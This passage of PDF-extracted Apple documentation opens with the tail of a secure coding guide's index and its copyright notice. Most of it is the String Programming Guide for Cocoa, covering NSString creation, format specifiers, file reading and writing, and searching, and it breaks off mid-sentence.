line 61, 101 argv(0) 61 attackers 8 audit logs 91 authentication 14, 90 authopen 65 Authorization Services 72 authorization granting 14 revoking 75 AuthorizationExecWithPrivilege 68 B buffer overflows 11, 17–29 calculating buffer sizes 25–26 checklist 97 detecting 28 integer arithmetic 27 strings 22 buffer overflows See also heap , stack 17 C certificates digital certificates 14 CFBundle 99 chflags 48 chmod 55 chown 55 close-on-exec flag 58 code insertion 37 command-line arguments 61, 101 command-line tools 100 configuration files 88 crackers 8 D default settings 73 denial of service 91 device ID 58 digital certificate identity 79 digital certificates 14 document organization 9 dyld 99 dynamic link editor 99 E elevated privileges 59, 86 encryption 15 environment variables 62, 88 F factoring applications 69 fchmod 55 fchown 55 file descriptor 50, 52 inheriting 58 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 110 Indexfile descriptors 61 file locations 75 file operations Carbon 55 Cocoa 51 insecure 13, 47–58 POSIX 50 file system, remotely mounted 57 files temporary 88 FileVault 75 firewall 91 fopen 55 format string attacks 34 FSFindFolder 50 fstat 55 fuzzing 39 G GID 64 group ID 64 guest access 96 GUI 88 H hackers 7 hard link 48 hash function 91, 102 heap 11 overflow 20, 22 I identity 79 input validation 12 input data structures 97 inappropriate 17 testing 28 to audit logs 92 types of 17 validating 19, 33–40, 100 insecure file operations 13, 47–58 installer 63 integer overflows 27 interface, user 76 ipfw 91 K Kerberos 96 kernel extensions 72, 89 kernel messages 102 kernel checklist 101 KEXT 72 L launchd 66, 87 least privilege, principle of 60 left bracket 57 libbsm 92 /Library/StartupItems 68 logs, audit 91 lstat 55 M Mach ports 101 mkstemp 53, 55 mktemp 55 N negative numbers 27 network ports 90 nobody user 84 NSBundle 99 NSTemporaryDirectory 51 Index 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 111O open 55 organization of document 9 P passwords 93 permissions 52 permissions See also privileges phishing 16, 78 plug-ins 99 policy database 69, 72 port numbers 90 ports, Mach 101 private key identity 79 privileges 14, 59–72 elevated 59, 86 level, changing 64 principle of least privilege 60 root 14 process limits 62 R race conditions 13, 43 interprocess communication 13 scripts 56 time of check–time of use 44–46 44–46 random numbers 97 references 10 remotely mounted file system 58 rm 48 root kit 89 root privileges 14 S script kiddies 8 scripts, avoiding race conditions 56 Security Objective-C API 79 setegid 65 seteuid 65 setgid 65 setregid 65 setreuid 65 setrlimit 62 setuid 65, 67 SFAuthorizationView 79 SFCertificatePanel 79 SFCertificateTrustPanel 79 SFCertificateView 79 SFChooseIdentityPanel 79 SFKeychainSavePanel 79 SFKeychainSettingsPanel 80 shell commands 100 signal handler 46 social engineering 16, 37, 78 stack 11 overflow 18–20 stat 55 statistics of threats and attacks 16 string-handling functions 22, 97 sudo 87 symbolic link 49 syslog 92 SystemStarter 68 T temporary files 50, 53, 88 and scripts 56 default location 50, 51 test 57 twos-complement arithmetic 27 U UID 64 Index 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 112unique 84 umask 52 URL commands 12, 36 user ID 64 user interface 76 V validating input 12, 33–40 W wildcard characters 89 X xinetd 68 Index 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 113Apple Inc. © 2012 Apple Inc. All rights reserved. No part of this publication may be reproduced, stored in a retrievalsystem, or transmitted, in any form or by any means, mechanical, electronic, photocopying, recording, or otherwise, without prior written permission of Apple Inc., with the following exceptions: Any person is hereby authorized to store documentation on a single computer for personal use only and to print copies of documentation for personal use provided that the documentation contains Apple’s copyright notice. No licenses, express or implied, are granted with respect to any of the technology described in this document. Apple retains all intellectual property rights associated with the technology described in this document. This document is intended to assist application developers to develop applications only for Apple-labeled computers. Apple Inc. 1 Infinite Loop Cupertino, CA 95014 408-996-1010 Apple, the Apple logo, Carbon, Cocoa, eMac, FileVault, iPhone, Keychain, Mac, Macintosh, Numbers, Objective-C, OS X, Pages, and Safari are trademarks of Apple Inc., registered in the U.S. and other countries. .Mac is a service mark of Apple Inc., registered in the U.S. and other countries. App Store and Mac App Store are service marks of Apple Inc. Java is a registered trademark of Oracle and/or its affiliates. Ping is a registered trademark of Karsten Manufacturing and is used in the U.S. under license. UNIX is a registered trademark of The Open Group. iOS is a trademark or registered trademark of Cisco in the U.S. and other countries and is used under license. Even though Apple has reviewed this document, APPLE MAKES NO WARRANTY OR REPRESENTATION, EITHER EXPRESS OR IMPLIED, WITH RESPECT TO THIS DOCUMENT, ITS QUALITY, ACCURACY, MERCHANTABILITY, OR FITNESS FOR A PARTICULAR PURPOSE.ASARESULT, THISDOCUMENT IS PROVIDED “AS IS,” AND YOU, THE READER, ARE ASSUMING THE ENTIRE RISK AS TO ITS QUALITY AND ACCURACY. IN NO EVENT WILL APPLE BE LIABLE FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL,OR CONSEQUENTIAL DAMAGES RESULTING FROM ANY DEFECT OR INACCURACY IN THIS DOCUMENT, even if advised of the possibility of such damages. THE WARRANTY AND REMEDIES SET FORTH ABOVE ARE EXCLUSIVE AND IN LIEU OF ALL OTHERS, ORAL OR WRITTEN, EXPRESS OR IMPLIED. No Apple dealer, agent, or employee is authorized to make any modification, extension, or addition to this warranty. Some states do not allow the exclusion or limitation of implied warranties or liability for incidental or consequential damages, so the above limitation or exclusion may not apply to you. This warranty gives you specific legal rights, and you may also have other rights which vary from state to state. String Programming GuideContents Introduction to String Programming Guide for Cocoa 5 Who Should Read This Document 5 Organization of This Document 5 See Also 6 Strings 7 Creating and Converting String Objects 8 Creating Strings 8 NSString from C Strings and Data 8 Variable Strings 9 Strings to Present to the User 10 Combining and Extracting Strings 10 Getting C Strings 11 Conversion Summary 12 Formatting String Objects 13 Formatting Basics 13 Strings and Non-ASCII Characters 14 NSLog and NSLogv 14 String Format Specifiers 15 Format Specifiers 15 Platform Dependencies 17 Reading Strings From and Writing Strings To Files and URLs 19 Reading From Files and URLs 19 Reading data with a known encoding 19 Reading data with an unknown encoding 20 Writing to Files and URLs 21 Summary 21 Searching, Comparing, and Sorting Strings 22 Search and Comparison Methods 22 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 2Searching strings 22 Comparing and sorting strings 23 Search and Comparison Options 24 Examples 24 Case-Insensitive Search for Prefix and Suffix 24 Comparing Strings 25 Sorting strings like Finder 26 Paragraphs and Line Breaks 28 Line and Paragraph Separator Characters 28 Separating a String “by Paragraph” 28 Characters and Grapheme Clusters 30 Character Sets 33 Character Set Basics 33 Creating Character Sets 33 Performance considerations 34 Creating a character set file 35 Standard Character Sets and Unicode Definitions 35 Scanners 36 Creating a Scanner 36 Using a Scanner 36 Example 38 Localization 39 String Representations of File Paths 40 Representing a Path 40 User Directories 41 Path Components 42 File Name Completion 43 Drawing Strings 44 Document Revision History 45 Index 47 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 3Tables String Format Specifiers 15 Table 1 Format specifiers supported by the NSString formatting methods and CFString formatting functions 15 Table 2 Length modifiers supported by the NSString formatting methods and CFString formatting functions 16 Table 3 Format specifiers for data types 17 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 4String Programming Guide for Cocoa describes how to create, search, concatenate, and draw strings. It also describes character sets, which let you search a string for characters in a group, and scanners, which convert numbers to strings and vice versa. Who Should Read This Document You should read this document if you need to work directly with strings or character sets. Organization of This Document This document contains the following articles: ● “Strings” (page 7) describes the characteristics of string objects in Cocoa. ● “Creating and Converting String Objects” (page 8) explains the ways in which NSString and its subclass NSMutableString create string objects and convert their contents to and from the various character encodings they support. ● “Formatting String Objects” (page 13) describes how to format NSString objects. ● “String Format Specifiers” (page 15) describes printf-style format specifiers supported by NSString. ● “Reading Strings From and Writing Strings To Files and URLs” (page 19) describes how to read strings from and write strings to files and URLs. ● “Searching, Comparing, and Sorting Strings” (page 22) describes methods for finding characters and substrings within strings and for comparing one string to another. ● “Paragraphs and Line Breaks” (page 28) describes how paragraphs and line breaks are represented. ● “Characters and Grapheme Clusters” (page 30) describes how you can break strings down into user-perceived characters. ● “Character Sets” (page 33) explains how to use character set objects, and how to use NSCharacterSet methods to create standard and custom character sets. ● “Scanners” (page 36) describes NSScanner objects, which interpret and convert the characters of an NSString object into number and string values. 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 5 Introduction to String Programming Guide for Cocoa● “String Representations of File Paths” (page 40) describes the NSString methods that manipulate strings as file-system paths. ● “Drawing Strings” (page 44) discusses the methods of the NSString class that support drawing directly in an NSView object. See Also For more information, refer to the following documents: ● Attributed String Programming Guide is closely related to String Programming Guide for Cocoa . It provides information about NSAttributedString objects, which manage sets of attributes, such as font and kerning, that are associated with character strings or individual characters. ● Data Formatting Guide describes how to format data using objects that create, interpret, and validate text. ● Internationalization Programming Topics provides information about localizing strings in your project, including information on how string formatting arguments can be ordered. ● String Programming Guide for Core Foundation in Core Foundation, discussesthe Core Foundation opaque type CFString, which is toll-free bridged with the NSString class. Introduction to String Programming Guide for Cocoa See Also 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 6String objects represent character strings in Cocoa frameworks. Representing strings as objects allows you to use strings wherever you use other objects. It also providesthe benefits of encapsulation,so thatstring objects can use whatever encoding and storage is needed for efficiency while simply appearing as arrays of characters. A string object is implemented as an array of Unicode characters (in other words, a text string). An immutable string is a text string that is defined when it is created and subsequently cannot be changed. To create and manage an immutable string, use the NSString class. To construct and manage a string that can be changed after it has been created, use NSMutableString. The objects you create using NSString and NSMutableString are referred to as string objects (or, when no confusion will result, merely as strings). The term C string refers to the standard C char * type. A string object presents itself as an array of Unicode characters. You can determine how many characters it contains with the length method and can retrieve a specific character with the characterAtIndex: method. These two “primitive” methods provide basic access to a string object. Most use of strings, however, is at a higher level, with the strings being treated as single entities: You compare strings against one another, search them for substrings, combine them into new strings, and so on. If you need to access string objects character-by-character, you must understand the Unicode character encoding—specifically, issues related to composed character sequences. For details see: ● The Unicode Standard, Version 4.0 . The Unicode Consortium. Boston: Addison-Wesley, 2003. ISBN 0-321-18578-1. ● The Unicode Consortium web site: http://www.unicode.org/. 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 7 StringsNSString and its subclass NSMutableString provide several ways to create string objects, most based around the various character encodingsitsupports. Although string objects always present their own contents as Unicode characters, they can convert their contents to and from many other encodings, such as 7-bit ASCII, ISO Latin 1, EUC, and Shift-JIS. The availableStringEncodings class method returns the encodings supported. You can specify an encoding explicitly when converting a C string to or from a string object, or use the default C string encoding, which varies from platform to platform and is returned by the defaultCStringEncoding class method. Creating Strings The simplest way to create a string object in source code is to use the Objective-C @"..." construct: NSString *temp = @"Contrafibularity"; Note that, when creating a string constant in this fashion, you should use UTF-8 characters. Such an object is created at compile time and exists throughout your program’s execution. The compiler makes such object constants unique on a per-module basis, and they’re never deallocated. You can also send messages directly to a string constant as you do any other string: BOOL same = [@"comparison" isEqualToString:myString]; NSString from C Strings and Data To create an NSString object from a C string, you use methods such as initWithCString:encoding:. You must correctly specify the character encoding of the C string. Similar methods allow you to create string objects from characters in a variety of encodings. The method initWithData:encoding: allows you to convert string data stored in an NSData object into an NSString object. char *utf8String = /* Assume this exists. */ ; NSString *stringFromUTFString = [[NSString alloc] initWithUTF8String:utf8String]; 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 8 Creating and Converting String Objectschar *macOSRomanEncodedString = /* assume this exists */ ; NSString *stringFromMORString = [[NSString alloc] initWithCString:macOSRomanEncodedString encoding:NSMacOSRomanStringEncoding]; NSData *shiftJISData = /* assume this exists */ ; NSString *stringFromShiftJISData = [[NSString alloc] initWithData:shiftJISData encoding:NSShiftJISStringEncoding]; The following example converts an NSString object containing a UTF-8 character to ASCII data then back to an NSString object. unichar ellipsis = 0x2026; NSString *theString = [NSString stringWithFormat:@"To be continued%C", ellipsis]; NSData *asciiData = [theString dataUsingEncoding:NSASCIIStringEncoding allowLossyConversion:YES]; NSString *asciiString = [[NSString alloc] initWithData:asciiData encoding:NSASCIIStringEncoding]; NSLog(@"Original: %@ (length %d)", theString, [theString length]); NSLog(@"Converted: %@ (length %d)", asciiString, [asciiString length]); // output: // Original: To be continued… (length 16) // Converted: To be continued... (length 18) Variable Strings To create a variable string, you typically use stringWithFormat:: or initWithFormat: (or for localized strings, localizedStringWithFormat:). These methods and theirsiblings use a formatstring as a template into which the values you provide (string and other objects, numerics values, and so on) are inserted. They and the supported format specifiers are described in “Formatting String Objects” (page 13). Creating and Converting String Objects Creating Strings 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 9You can build a string from existing string objects using the methods stringByAppendingString: and stringByAppendingFormat: to create a new string by adding one string after another, in the second case using a format string. NSString *hString = @"Hello"; NSString *hwString = [hString stringByAppendingString:@", world!"]; Strings to Present to the User When creating strings to present to the user, you should consider the importance of localizing your application. In general, you should avoid creating user-visible strings directly in code. Instead you should use strings in your code as a key to a localization dictionary that will supply the user-visible string in the user's preferred language. Typically thisinvolves using NSLocalizedString and similar macros, asillustrated in the following example. NSString *greeting = NSLocalizedStringFromTable (@"Hello", @"greeting to present in first launch panel", @"greetings"); For more about internationalizing your application, see Internationalization Programming Topics. “Localizing String Resources” describes how to work with and reorder variable arguments in localized strings. Combining and Extracting Strings You can combine and extract strings in various ways. The simplest way to combine two strings is to append one to the other. The stringByAppendingString: method returns a string object formed from the receiver and the given argument. NSString *beginning = @"beginning"; NSString *alphaAndOmega = [beginning stringByAppendingString:@" and end"]; // alphaAndOmega is @"beginning and end" You can also combine several strings according to a template with the initWithFormat:, stringWithFormat:, and stringByAppendingFormat: methods; these are described in more detail in “Formatting String Objects” (page 13). Creating and Converting String Objects Combining and Extracting Strings 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 10You can extract substrings from the beginning or end of a string to a particular index, or from a specific range, with the substringToIndex:, substringFromIndex:, and substringWithRange: methods. You can also split a string into substrings (based on a separator string) with the componentsSeparatedByString: method. These methods are illustrated in the following examples—notice that the index of the index-based methods starts at 0: NSString *source = @"0123456789"; NSString *firstFour = [source substringToIndex:4]; // firstFour is @"0123" NSString *allButFirstThree = [source substringFromIndex:3]; // allButFirstThree is @"3456789" NSRange twoToSixRange = NSMakeRange(2, 4); NSString *twoToSix = [source substringWithRange:twoToSixRange]; // twoToSix is @"2345" NSArray *split = [source componentsSeparatedByString:@"45"]; // split contains { @"0123", @"6789" } If you need to extract strings using pattern-matching rather than an index, you should use a scanner—see “Scanners” (page 36). Getting C Strings To get a C string from a string object, you are recommended to use UTF8String. This returns a const char * using UTF8 string encoding. const char *cString = [@"Hello, world" UTF8String]; The C string you receive is owned by a temporary object, and will become invalid when automatic deallocation takes place. If you want to get a permanent C string, you must create a buffer and copy the contents of the const char * returned by the method. Similar methods allow you to create string objects from characters in the Unicode encoding or an arbitrary encoding, and to extract data in these encodings. initWithData:encoding: and dataUsingEncoding: perform these conversions from and to NSData objects. Creating and Converting String Objects Getting C Strings 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 11Conversion Summary This table summarizes the most common means of creating and converting string objects: Source Creation method Extraction method In code @"..." compiler construct N/A UTF8 encoding stringWithUTF8String: UTF8String getCharacters: getCharacters:range: Unicode encoding stringWithCharacters: length: Arbitrary encoding initWithData: encoding: dataUsingEncoding: stringByAppendingString: N/A stringByAppendingFormat: Existing strings localizedStringWithFormat: Use NSScanner initWithFormat: locale: Format string Localized strings NSLocalizedString and similar N/A Creating and Converting String Objects Conversion Summary 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 12This article describes how to create a string using a format string, how to use non-ASCII characters in a format string, and a common error that developers make when using NSLog or NSLogv. Formatting Basics NSString uses a format string whose syntax is similar to that used by other formatter objects. It supports the format characters defined for the ANSI C function printf(), plus %@ for any object (see “String Format Specifiers” (page 15) and the IEEE printf specification). If the object responds to descriptionWithLocale: messages, NSString sends such a message to retrieve the text representation. Otherwise, it sends a description message. “Localizing String Resources” describes how to work with and reorder variable arguments in localized strings. In formatstrings, a ‘%’ character announces a placeholder for a value, with the charactersthat follow determining the kind of value expected and how to format it. For example, a format string of "%d houses" expects an integer value to be substituted for the format expression '%d'. NSString supportsthe format characters defined for the ANSI C functionprintf(), plus ‘@’ for any object. If the object responds to the descriptionWithLocale: message, NSString sends that message to retrieve the text representation, otherwise, it sends a description message. Value formatting is affected by the user’s current locale, which is an NSDictionary object that specifies number, date, and other kinds of formats. NSString uses only the locale’s definition for the decimal separator (given by the key named NSDecimalSeparator). If you use a method that doesn’t specify a locale, the string assumes the default locale. You can use NSString’s stringWithFormat: method and other related methods to create strings with printf-style formatspecifiers and argument lists, as described in “Creating and Converting StringObjects” (page 8). The examples below illustrate how you can create a string using a variety of formatspecifiers and arguments. NSString *string1 = [NSString stringWithFormat:@"A string: %@, a float: %1.2f", @"string", 31415.9265]; // string1 is "A string: string, a float: 31415.93" NSNumber *number = @1234; 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 13 Formatting String ObjectsNSDictionary *dictionary = @{ [NSDate date]:@"date" }; NSString *baseString = @"Base string."; NSString *string2 = [baseString stringByAppendingFormat: @" A number: %@, a dictionary: %@", number, dictionary]; // string2 is "Base string. A number: 1234, a dictionary: {date = 2005-10-17 09:02:01 -0700; }" Strings and Non-ASCII Characters You can include non-ASCII characters(including Unicode) in strings usingmethodssuch as stringWithFormat: and stringWithUTF8String:. NSString *s = [NSString stringWithFormat:@"Long %C dash", 0x2014]; Since \xe2\x80\x94 is the 3-byte UTF-8 string for 0x2014, you could also write: NSString *s = [NSString stringWithUTF8String:"Long \xe2\x80\x94 dash"]; NSLog and NSLogv The utility functions NSLog() and NSLogv() use the NSString string formatting servicesto log error messages. Note that as a consequence of this, you should take care when specifying the argument for these functions. A common mistake isto specify a string that includesformatting characters, asshown in the following example. NSString *string = @"A contrived string %@"; NSLog(string); // The application will probably crash here due to signal 10 (SIGBUS) It is better (safer) to use a format string to output another string, as shown in the following example. NSString *string = @"A contrived string %@"; NSLog(@"%@", string); // Output: A contrived string %@ Formatting String Objects Strings and Non-ASCII Characters 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 14This article summarizes the format specifiers supported by string formatting methods and functions. Format Specifiers The format specifiers supported by the NSString formatting methods and CFString formatting functions follow the IEEE printf specification; the specifiers are summarized in Table 1 (page 15). Note that you can also use the “n$” positional specifiers such as %1$@ %2$s. For more details, see the IEEE printf specification. You can also use these format specifiers with the NSLog function. Table 1 Format specifiers supported by the NSString formatting methods and CFString formatting functions Specifier Description Objective-C object, printed as the string returned by descriptionWithLocale: if available, or description otherwise. Also works with CFTypeRef objects, returning the result of the CFCopyDescription function. %@ %% '%' character. %d, %D Signed 32-bit integer (int). %u, %U Unsigned 32-bit integer (unsigned int). Unsigned 32-bit integer (unsigned int), printed in hexadecimal using the digits 0–9 and lowercase a–f. %x Unsigned 32-bit integer (unsigned int), printed in hexadecimal using the digits 0–9 and uppercase A–F. %X %o, %O Unsigned 32-bit integer (unsigned int), printed in octal. %f 64-bit floating-point number (double). 64-bit floating-point number (double), printed in scientific notation using a lowercase e to introduce the exponent. %e 64-bit floating-point number (double), printed in scientific notation using an uppercase E to introduce the exponent. %E 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 15 String Format SpecifiersSpecifier Description 64-bit floating-point number (double), printed in the style of %e if the exponent is less than –4 or greater than or equal to the precision, in the style of %f otherwise. %g 64-bit floating-point number (double), printed in the style of %E if the exponent is less than –4 or greater than or equal to the precision, in the style of %f otherwise. %G 8-bit unsigned character (unsigned char), printed by NSLog() as an ASCII character, or, if not an ASCII character, in the octal format \\ddd or the Unicode hexadecimal format \\udddd, where d is a digit. %c 16-bit Unicode character (unichar), printed by NSLog() as an ASCII character, or, if not an ASCII character, in the octal format \\ddd or the Unicode hexadecimal format \\udddd, where d is a digit. %C Null-terminated array of 8-bit unsigned characters. Because the %s specifier causes the characters to be interpreted in the system default encoding, the results can be variable, especially with right-to-left languages. For example, with RTL, %s inserts direction markers when the characters are not strongly directional. For this reason, it’s best to avoid %s and specify encodings explicitly. %s %S Null-terminated array of 16-bit Unicode characters. Void pointer (void *), printed in hexadecimal with the digits 0–9 and lowercase a–f, with a leading 0x. %p 64-bit floating-point number (double), printed in scientific notation with a leading 0x and one hexadecimal digit before the decimal point using a lowercase p to introduce the exponent. %a 64-bit floating-point number (double), printed in scientific notation with a leading 0X and one hexadecimal digit before the decimal point using a uppercase P to introduce the exponent. %A %F 64-bit floating-point number (double), printed in decimal notation. Table 2 Length modifiers supported by the NSString formatting methods and CFString formatting functions Length Description modifier Length modifier specifying that a following d, o, u, x, or X conversion specifier applies to a short or unsigned short argument. h Length modifier specifying that a following d, o, u, x, or X conversion specifier applies to a signed char or unsigned char argument. hh String Format Specifiers Format Specifiers 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 16Length Description modifier Length modifier specifying that a following d, o, u, x, or X conversion specifier applies to a long or unsigned long argument. l Length modifiers specifying that a following d, o, u, x, or X conversion specifier applies to a long long or unsigned long long argument. ll, q Length modifier specifying that a following a, A, e, E, f, F, g, or G conversion specifier applies to a long double argument. L Length modifier specifying that a following d, o, u, x, or X conversion specifier applies to a size_t or the corresponding signed integer type argument. z Length modifier specifying that a following d, o, u, x, or X conversion specifier applies to a ptrdiff_t or the corresponding unsigned integer type argument. t Length modifier specifying that a following d, o, u, x, or X conversion specifier applies to a intmax_t or uintmax_t argument. j Platform Dependencies OS X uses several data types—NSInteger, NSUInteger,CGFloat, and CFIndex—to provide a consistent means of representing values in 32- and 64-bit environments. In a 32-bit environment, NSInteger and NSUInteger are defined as int and unsigned int, respectively. In 64-bit environments, NSInteger and NSUInteger are defined as long and unsigned long, respectively. To avoid the need to use different printf-style type specifiers depending on the platform, you can use the specifiers shown in Table 3. Note that in some cases you may have to cast the value. Table 3 Format specifiers for data types Type Format specifier Considerations NSInteger %ld or %lx Cast the value to long. NSUInteger %lu or %lx Cast the value to unsigned long. %f works for floats and doubles when formatting; but note the technique described below for scanning. CGFloat %f or %g CFIndex %ld or %lx The same as NSInteger. %p adds 0x to the beginning of the output. If you don't want that, use %zx and no typecast. pointer %p or %zx String Format Specifiers Platform Dependencies 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 17The following example illustrates the use of %ld to format an NSInteger and the use of a cast. NSInteger i = 42; printf("%ld\n", (long)i); In addition to the considerations mentioned in Table 3, there is one extra case with scanning: you must distinguish the types for float and double. You should use %f for float, %lf for double. If you need to use scanf (or a variant thereof) with CGFloat, switch to double instead, and copy the double to CGFloat. CGFloat imageWidth; double tmp; sscanf (str, "%lf", &tmp); imageWidth = tmp; It is important to remember that %lf does not represent CGFloat correctly on either 32- or 64-bit platforms. This is unlike %ld, which works for long in all cases. String Format Specifiers Platform Dependencies 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 18Reading files or URLs using NSString is straightforward provided that you know what encoding the resource uses—if you don't know the encoding, reading a resource is more challenging. When you write to a file or URL, you must specify the encoding to use. (Where possible, you should use URLs because these are more efficient.) Reading From Files and URLs NSString provides a variety of methods to read data from files and URLs. In general, it is much easier to read data if you know its encoding. If you have plain text and no knowledge of the encoding, you are already in a difficult position. You should avoid placing yourself in this position if at all possible—anything that calls for the use of plain text files should specify the encoding (preferably UTF-8 or UTF-16+BOM). Reading data with a known encoding To read from a file or URL for which you know the encoding, you use stringWithContentsOfFile:encoding:error: or stringWithContentsOfURL:encoding:error:, or the corresponding init... method, as illustrated in the following example. NSURL *URL = ...; NSError *error; NSString *stringFromFileAtURL = [[NSString alloc] initWithContentsOfURL:URL encoding:NSUTF8StringEncoding error:&error]; if (stringFromFileAtURL == nil) { // an error occurred NSLog(@"Error reading file at %@\n%@", URL, [error localizedFailureReason]); // implementation continues ... You can also initialize a string using a data object, as illustrated in the following examples. Again, you must specify the correct encoding. 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 19 Reading Strings From and Writing Strings To Files and URLsNSURL *URL = ...; NSData *data = [NSData dataWithContentsOfURL:URL]; // Assuming data is in UTF8. NSString *string = [NSString stringWithUTF8String:[data bytes]]; // if data is in another encoding, for example ISO-8859-1 NSString *string = [[NSString alloc] initWithData:data encoding: NSISOLatin1StringEncoding]; Reading data with an unknown encoding If you find yourself with text of unknown encoding, it is best to make sure that there is a mechanism for correcting the inevitable errors. For example, Apple's Mail and Safari applications have encoding menus, and TextEdit allows the user to reopen the file with an explicitly specified encoding. If you are forced to guess the encoding (and note that in the absence of explicit information, it is a guess): 1. Try stringWithContentsOfFile:usedEncoding:error: or initWithContentsOfFile:usedEncoding:error: (or the URL-based equivalents). These methods try to determine the encoding of the resource, and if successful return by reference the encoding used. 2. If (1) fails, try to read the resource by specifying UTF-8 as the encoding. 3. If (2) fails, try an appropriate legacy encoding. "Appropriate" here depends a bit on circumstances; it might be the default C string encoding, it might be ISO or Windows Latin 1, or something else, depending on where your data are coming from. 4. Finally, you can try NSAttributedString's loading methods from the Application Kit (such as initWithURL:options:documentAttributes:error:). These methods attempt to load plain text files, and return the encoding used. They can be used on more-or-less arbitrary text documents, and are worth considering if your application has no special expertise in text. They might not be as appropriate for Foundation-level tools or documents that are not natural-language text. Reading Strings From and Writing Strings To Files and URLs Reading From Files and URLs 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 20Writing to Files and URLs Compared with reading data from a file or URL, writing isstraightforward—NSString providestwo convenient methods, writeToFile:atomically:encoding:error: and writeToURL:atomically:encoding:error:. You must specify the encoding that should be used, and choose whether to write the resource atomically or not. If you do not choose to write atomically, the string is written directly to the path you specify. If you choose to write it atomically, it is written first to an auxiliary file, and then the auxiliary file is renamed to the path. This option guarantees that the file, if it exists at all, won’t be corrupted even if the system should crash during writing. If you write to an URL, the atomicity option is ignored if the destination is not of a type that can be accessed atomically. NSURL *URL = ...; NSString *string = ...; NSError *error; BOOL ok = [string writeToURL:URL atomically:YES encoding:NSUnicodeStringEncoding error:&error]; if (!ok) { // an error occurred NSLog(@"Error writing file at %@\n%@", path, [error localizedFailureReason]); // implementation continues ... Summary This table summarizes the most common means of reading and writing string objects to and from files and URLs: Source Creation method Extraction method writeToURL: atomically:encoding: error: stringWithContentsOfURL: encoding:error: stringWithContentsOfURL: usedEncoding:error: URL contents writeToFile: atomically:encoding: error: stringWithContentsOfFile: encoding:error: stringWithContentsOfFile: usedEncoding:error: File contents Reading Strings From and Writing Strings To Files and URLs Writing to Files and URLs 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 21The string classes provide methods for finding characters and substrings within strings and for comparing one string to another. These methods conform to the Unicode standard for determining whether two character sequences are equivalent. The string classes provide comparison methods that handle composed character sequences properly, though you do have the option of specifying a literal search when efficiency is important and you can guarantee some canonical form for composed character sequences. Search and Comparison Methods The search and comparison methods each come in several variants. The simplest version of each searches or compares entire strings. Other variants allow you to alter the way comparison of composed charactersequences is performed and to specify a specific range of characters within a string to be searched or compared; you can also search and compare strings in the context of a given locale. These are the basic search and comparison methods: Search methods Comparison methods rangeOfString: compare: rangeOfString: options: compare:options: rangeOfString: options:range: compare:options: range: rangeOfString: options:range: locale: compare:options: range:locale: rangeOfCharacterFromSet: rangeOfCharacterFromSet: options: rangeOfCharacterFromSet: options:range: Searching strings You use the rangeOfString:... methods to search for a substring within the receiver. The rangeOfCharacterFromSet:... methodssearch for individual charactersfrom a supplied set of characters. 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 22 Searching, Comparing, and Sorting StringsSubstrings are found only if completely contained within the specified range. If you specify a range for a search or comparison method and don’t request NSLiteralSearch (see below), the range must not break composed character sequences on either end; if it does, you could get an incorrect result. (See the method description for rangeOfComposedCharacterSequenceAtIndex: for a code sample that adjusts a range to lie on character sequence boundaries.) You can also scan a string object for numeric and string values using an instance of NSScanner. For more about scanners, see “Scanners” (page 36). Both the NSString and the NSScanner class clusters use the NSCharacterSet class cluster forsearch operations. For more about charactersets,see “Character Sets” (page 33). If you simply want to determine whether a string contains a given pattern, you can use a predicate: BOOL match = [myPredicate evaluateWithObject:myString]; For more about predicates, see Predicate Programming Guide . Comparing and sorting strings The compare:... methods return the lexical ordering of the receiver and the supplied string. Several other methods allow you to determine whether two strings are equal or whether one isthe prefix orsuffix of another, but they don’t have variants that allow you to specify search options or ranges. The simplest method you can use to compare strings is compare:—this is the same as invoking compare:options:range: with no options and the receiver’s full extent as the range. If you want to specify comparison options(NSCaseInsensitiveSearch, NSLiteralSearch, or NSNumericSearch) you can use compare:options:; if you want to specify a locale you can use compare:options:range:locale:. NSString also provides various convenience methodsto allow you to perform common comparisons without the need to specify ranges and options directly, for example caseInsensitiveCompare: and localizedCompare:. Important: For user-visible sorted lists, you should always use localized comparisons. Thustypically instead of compare: or caseInsensitiveCompare: you should use localizedCompare: or localizedCaseInsensitiveCompare:. If you want to compare strings to order them in the same way as they’re presented in Finder, you should use compare:options:range:locale: with the user’s locale and the following options: NSCaseInsensitiveSearch, NSNumericSearch, NSWidthInsensitiveSearch, and NSForcedOrderingSearch. For an example, see “Sorting strings like Finder” (page 26). Searching, Comparing, and Sorting Strings Search and Comparison Methods 2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved. 23Search and Comparison Options Several of the search and comparison methods take an “options” argument. This is a bit mask that adds further constraints to the operation. You create the mask by combining the following options (not all options are available for every method): Search option Effect NSCaseInsensitive- Ignores case distinctions among characters. Search Performs a byte-for-byte comparison. Differing literal sequences (such as composed character sequences) that would otherwise be considered equivalent are considered not to match. Using this option can speed some operations dramatically. NSLiteralSearch NSBackwardsSearch Performs searching from the end of the range toward the beginning. Performs searching only on characters at the beginning or end of the range. No match at the beginning or end means nothing is found, even if a matching sequence of characters occurs elsewhere in the string. NSAnchoredSearch When used with the compare:options: methods, groups of numbers are treated as a numeric value for the purpose of comparison. For example, 